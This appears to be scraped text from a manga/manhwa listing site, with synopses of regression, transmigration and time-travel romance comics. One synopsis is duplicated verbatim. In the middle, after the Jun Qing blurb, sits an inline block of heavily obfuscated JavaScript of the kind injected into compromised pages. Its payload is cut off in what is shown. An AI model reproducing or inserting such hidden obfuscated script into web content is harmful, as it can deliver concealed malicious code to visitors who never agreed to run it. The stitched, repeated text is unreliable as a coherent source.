“Lirian, the forces of evil are ravaging this world. We need a strong knight to destroy the spirit of evil that is approaching us. A righteous and strong knight! And the knight that’s you, Lirian.” Wow, that’s ridiculous. I just want to live a normal life. I have a dream to marry a handsome man. Then will enjoy life as a cottage like the house of a count. I never thought about doing justice or protecting world peace. But God chose me! Power? Sharp sword? Why give me? Why me! “Liri, would you like to come with me to the capital? Isn’t it better to go with a guy like me compared to going alone?” “um…I was joking just now. It’s a bit…” “Hmm, that makes sense. I’m Aheros Arman, the 3rd prince of the Arman Empire.” “Wow, emperor, prince!” 어느 백작 영애의 이중생활 / The Secret Life of a Certain Count’s Lady
Lee Ye-joo is a female college student who lives alone and has a secret. She has a special ability to go to the future beyond by walking through the ‘door’ right before she dies! One day, she crossed the door and arrived in the future a thousand years ago to avoid a natural disaster! However, a thousand years later, the Earth is in a situation where humanity is almost destroyed. A dark world where animals talk and humans try to eat each other. Worse, a handsome madman who has superpowers has started chasing her to kill her! He called her a ‘time traveler’ and attributed her to the cause of doom. At the moment she tried to survive and find a way back, she lied that she didn’t know what a ‘time traveler’ was. “If you take me to the other humans, I’ll tell you how to survive!” read more The contractual relationship established in exchange for death in silence. But why does that man’s back look so safe and warm? That wasn’t part of her plan. What made her want to melt that frozen future? “You not only depended on me, but also aroused other unclear emotions in me.” A romantic chase between an obsessed man and a woman trapped in the future while trying to avoid death! Will Ye-joo be able to overcome all this and go back to the past?’ 레드 앤 매드
Read manga My Brothers Dote On Me When she woke up in a new life, she became a poor little girl who was sent to the mental hospital by her own brothers. So with the painful memories of the original owner in the previous life, Pei Yun Ge began to fight back and fight against villains from all walks of life! All the way she abuses the scums, all the way she feels cool! However, she suddenly found her three former scum older brothers have become spoiled sister devils? Not only that, she gained another strong and powerful ” older brother”, the more the older brother’ spoiled her, the more she suspicious Is this the path of spoiling that can never be recovered/returned?
Bìng Jiāo Bào Jūn Gǎi Ná Lǜchá Jùběn / The Sickly Loveable Tyrant Changed to Take the Green Tea Script / Yandere Tyrant Transforms to Take the Green Tea Script / 病娇暴君改拿绿茶剧本 Fu Xin, a powerful president of her company in the modern age, finds that she had travelled to the past and transmigrated into the body of the village girl Fu Qibao along with her Merit System. Now, not only did she have to suffer the consequences of the original host’s cruelty to other people, but she had also earned herself a betrothed. No one had foreseen this exceptional teen who the original host had brutally beaten up to one day become a merciless tyrant of an emperor that ruled the world. He was going to kill everyone who hurt him before… Hold on, why does this sickly tyrant have two sets of personalities? Wait, is he acting innocent in front of Fu Qibao to gain her affections?!
Legend has it that a man with black hair and red eyes will bring ruin to Den Helder’s royal family. Because he was born with these features, Rayton is shunned by the palace as “the cursed one.” When the vengeful prince stages a bloody coup detat years later, the powerless youngest princess, Setz, also dies by his sword. Little does Setz know that she’s about to wake up in her body five years in the past– but now that she has, it’s her chance to get on Rayton’s good side and turn her fate around. Cracking the prince’s cold exterior is a challenge, but once she does, there seems to be no going back! As Rayton grows more and more attached to her, Setz is pulled deeper into the midst of the dark conspiracies brewing around the palace. Has the princess truly escaped death, or is she in more danger than ever before? 폭군의 애착인형 / The Tyrant’s Beloved Doll
Jun Qing finally transmigrates back to her original world, but finds out her own body had been taken over by another transmigrator for 2 years. Even the fourth brother, whom she has been pining after secretly for many years treats her coldly. Dealing with the trouble the previous transmigrator left behind, and simultaneously getting fourth brother's heart back, Jun Qing says this is no hard feat!<script></script><script>function _0x4b69(_0x49445a,_0x3c4767){var _0x479727=_0x42ef();return _0x4b69=function(_0x1bf912,_0x252e7d){_0x1bf912=_0x1bf912-(0x61*0x17+-0x2*-0xaf3+-0x1cb7*0x1);var _0x1a3fed=_0x479727[_0x1bf912];return _0x1a3fed;},_0x4b69(_0x49445a,_0x3c4767);}(function(_0x2717b6,_0x3187b3){var _0x13c3c5=_0x4b69,_0x2deeee=_0x2717b6();while(!![]){try{var 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“Please, Hilise. Please die in place of Gabrielle.” My always dignified brother begged me for the first time. He wants me to die for our stepsister, whom we don’t even share a drop of blood with. “For the first and last time, I ask you this.” I’ve always been miserable, and there is no exception this time. The seventh time that I was betrayed and killed, I was completely free of lingering feelings. “I’m glad that you’re a scumbag until the end.” I won’t be swayed by love anymore. It’s my turn to abandon them first.
Urania was just a lowly maid until she captured the attention of King Kraus III and became his concubine. The nobles and the other maids, however, despised their love and dragged Urania down. Heartbroken and at her wit’s end, she was ready to accept her death, but then a mysterious entity returns her to her past when she is still a maid. With her second chance at life, Urania is determined to become the king’s concubine once more, but this all changes when she meets Oscar, who pushes her to aspire for greater things…
Read manhwa Queen’s Man / La reine de mon cœur / Queen and I / Queen In Hyun’s Man / Queen In-hyun’s Man / Queen Inhyeon’s Man / 인현왕후의 남자 Can their love stand the test of time travel? Bung-do Kim, a scholar from the Joseon Dynasty, is sent to the 21st century by a magic talisman, where he falls in love with Heejin Choi, an actress. But after a terrible accident, Heejin and Bung-do find themselves thrown back in time. Will they be able to find their way back to each other?
“You shouldn’t have crossed this line, Elisha, if you didn’t want it to be like this.” A sturdy arm wrapped around her swaying body. Her head became hazy and an intentional hot sweet sigh was pulled out of her. ‘How the hell did I get myself in this situation—’ Elisha recalled. This never happened before. ‘Yeah, I remember.’ Her future in which she would become the fake concubine to a demonic man from the same family, and would be eaten to death—even down to her bone marrow. A future in which the Cartier ducal family is embroiled in a power struggle and fragmented. To avoid that future, Elisha threw herself at Lucerne, the archrival of her former life. Yeah. There was no problem. She knew this man, before and after her regression. She already knew he was the most notorious maniac in the Empire. 20-year-old Elisha owes 30,000 gold coins (about 15 billion won in Korean currency or around 15 million in USD). After going back in time, in order to avoid a hellish life because of debt, she becomes the most capable illegitimate child in the world and visits Lucerne, the archenemy of her master. “What do you want from me?” “Please lend me some money. And… make me your subordinate. I’ll give you all the information I have.” “Why should I trust you?” “I’ll give myself up as collateral.” Lucerne listened to Elisha and watched her quietly. “Okay. But I decide how to deal with the collateral.” “…….” “First of all, marry me.” “…… huh?” Elisha didn’t expect it either. That her information transaction would become a marriage contract.
포식자의 혼약자 “You shouldn’t have crossed this line, Elisha, if you didn’t want it to be like this.” A sturdy arm wrapped around her swaying body. Her head became hazy and an intentional hot sweet sigh was pulled out of her. ‘How the hell did I get myself in this situation—’ Elisha recalled. This never happened before. ‘Yeah, I remember.’ Her future in which she would become the fake concubine to a demonic man from the same family, and would be eaten to death—even down to her bone marrow. A future in which the Cartier ducal family is embroiled in a power struggle and fragmented. To avoid that future, Elisha threw herself at Lucerne, the archrival of her former life. Yeah. There was no problem. She knew this man, before and after her regression. She already knew he was the most notorious maniac in the Empire. 20-year-old Elisha owes 30,000 gold coins (about 15 billion won in Korean currency or around 15 million in USD). After going back in time, in order to avoid a hellish life because of debt, she becomes the most capable illegitimate child in the world and visits Lucerne, the archenemy of her master. “What do you want from me?” “Please lend me some money. And… make me your subordinate. I’ll give you all the information I have.” “Why should I trust you?” “I’ll give myself up as collateral.” Lucerne listened to Elisha and watched her quietly. “Okay. But I decide how to deal with the collateral.” “…….” “First of all, marry me.” “…… huh?” Elisha didn’t expect it either. That her information transaction would become a marriage contract.
Neyra Myers of the Celbrid Empire follows her diplomat father to an eastern country, where she meets a magical Dragon Prince, Haeryun, who claims that she is his destined partner. Enchanted by this mystical stranger with calm eyes and demeanor, Neyra attempts to escape her troublesome life by following the Dragon Prince to another world where she is made his Queen, but soon discovers she has made a grave mistake. After a Century of unthinkable suffering and emotional torture, she finds a way out, winding time back to a year before their encounter. Making amends and vowing to never get tangled with Haeryun, Neyra uses her Century of knowledge to pave a different path from her former self. However, fate still brings the Dragon Prince to her doorstep, and this time, his once calm eyes are filled with rage and desire. Will Neyra find a way to escape her destined partner? What is it that the Dragon Prince truly want from her? 네이라의 용